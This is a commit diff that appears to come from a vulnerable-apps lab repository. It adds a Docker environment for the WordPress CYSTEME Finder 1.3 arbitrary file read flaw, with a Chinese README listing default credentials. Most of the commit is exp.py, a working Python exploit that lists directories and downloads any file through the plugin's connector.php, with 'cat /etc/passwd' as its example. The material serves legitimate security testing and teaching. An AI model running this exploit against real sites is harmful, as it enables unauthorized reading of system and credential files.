(Add Vul: WordPress) CYSTEME Finder 1.3 任意文件读取漏洞环境

thanks @Jeremy-is-here

w/wordpress/3/Dockerfile

@@ -0,0 +1,16 @@
+FROM medicean/vulapps:base_wordpress
+MAINTAINER jeremy.jeremy@foxmail.com
+
+COPY src/WordPress-Plugin-CYSTEME-Finder-1.3.zip /tmp/WordPress-Plugin-CYSTEME-Finder-1.3.zip
+
+RUN apt-get install -y unzip
+
+RUN set -x \
+    && /etc/init.d/mysql start \
+    && unzip -x /tmp/WordPress-Plugin-CYSTEME-Finder-1.3.zip -d /var/www/html/wp-content/plugins/ \
+    && chown -R www-data:www-data /var/www/html/ \
+    && wp --path=/var/www/html/ plugin activate cysteme-finder --allow-root \
+    && rm -rf /tmp/*
+
+EXPOSE 80
+CMD ["/start.sh"]

w/wordpress/3/README.md

@@ -0,0 +1,50 @@
+## WordPress CYSTEME Finder 1.3 任意文件读取漏洞环境
+
+### 说明
+
+感谢 [@Jeremy-is-here](https://github.com/Jeremy-is-here)
+
+### 漏洞信息
+
+ * [WordPress Plugin CYSTEME Finder 1.3 - Arbitrary File Disclosure/Arbitrary File Upload](https://www.exploit-db.com/exploits/40295/)
+
+WordPress CYSTEME Finder 插件 1.3 版本中, `php/connector.php` 文件未对访问者cookies进行校验，导致出现任意文件读取漏洞。
+
+
+### 镜像信息
+
+类型 | 用户名 | 密码
+:-:|:-:|:-:
+Mysql | root | root
+/wp-admin/ | admin | admin123
+
+
+### 获取环境:
+
+1. 拉取镜像到本地
+
+ ```
+$ docker pull medicean/vulapps:w_wordpress_3
+ ```
+
+2. 启动环境
+
+ ```
+$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_3
+ ```
+
+ > `-p 8000:80` 前面的 8000 代表物理机的端口，可随意指定。 
+
+### 使用与利用
+
+访问 `http://你的 IP 地址:端口号/`
+
+### PoC/EXP 使用
+
+1. 修改 exp.py 中的 `TARGET_HOST`
+
+2. 运行 `exp.py`，按提示操作。
+
+ ```
+$ python exp.py
+ ```

w/wordpress/3/exp.py

@@ -0,0 +1,72 @@
+#!/usr/bin/evn python
+# -*-:coding:utf-8 -*-
+# Source: https://www.exploit-db.com/exploits/40295/
+
+import httplib
+from json import loads
+
+TARGET_HOST = "127.0.0.1:32768"
+
+
+def common(path):
+    global TARGET_HOST
+    conn = httplib.HTTPConnection(TARGET_HOST)
+    conn.request("GET", "/wp-content/plugins/cysteme-finder/php/connector.php?wphome=" + path + "&cmd=open&init=1&tree=1")
+    return loads(conn.getresponse().read())
+
+
+def ls(path):
+    try:
+        data = common(path)["files"]
+        print
+        print "Total files: %d\n" % len(data)
+        for counter in range(len(data)):
+            if data[counter]["mime"]:
+                print data[counter]["mime"], ":",
+            else:
+                print "Unknown type", ":",
+            print data[counter]["name"]
+        print "\n"
+    except KeyError:
+        print "没有这个文件夹 / No such FOLDER\n"
+
+
+def cat(raw_path):
+    global TARGET_HOST
+    path = ""
+    split_path = raw_path.split("/")
+    filename = split_path[-1]
+    for counter in range(len(split_path) - 1):
+        path += "/"
+        path += split_path[counter]
+    try:
+        data = common(path)["files"]
+        print
+        for counter in range(len(data)):
+            if data[counter]["name"] == filename:
+                hashstr = data[counter]["hash"]
+                conn = httplib.HTTPConnection(TARGET_HOST)
+                conn.request("GET", "/wp-content/plugins/cysteme-finder/php/connector.php?wphome=" + path + "&cmd=file&target=" + hashstr + "&download=1")
+                print conn.getresponse().read()
+    except KeyError:
+        print "没有这个文件夹 / No such FOLDER\n"
+
+
+print "用法示例：ls /etc , cat /etc/passwd。请使用绝对路径。键入'exit'退出。\
+    \ne.g.: ls /etc , cat /etc/passwd. Please use ABSOLUTE PATH. Type \
+    exit to leave. \n"
+
+while True:
+    raw_instruction = raw_input()
+    instruction = raw_instruction.split()
+    if instruction[0] == "exit":
+        exit()
+    if len(instruction) > 1:
+        if instruction[0] == "ls":
+            ls(instruction[1])
+        elif instruction[0] == "cat":
+            cat(instruction[1])
+        else:
+            print "未定义相关操作 / Undefined actions"
+    else:
+            print "缺少参数 / Missing Parameters"

w/wordpress/README.md

@@ -3,3 +3,4 @@ WordPress
 
 1. [WordPress Double Opt-In for Download Plugin 2.0.9 SQL 注入漏洞](1/)
 2. [WordPress Mailpress Plugin <= 4.5.2 远程代码执行漏洞](2/)
+3. [WordPress CYSTEME Finder 1.3 任意文件读取漏洞](3/)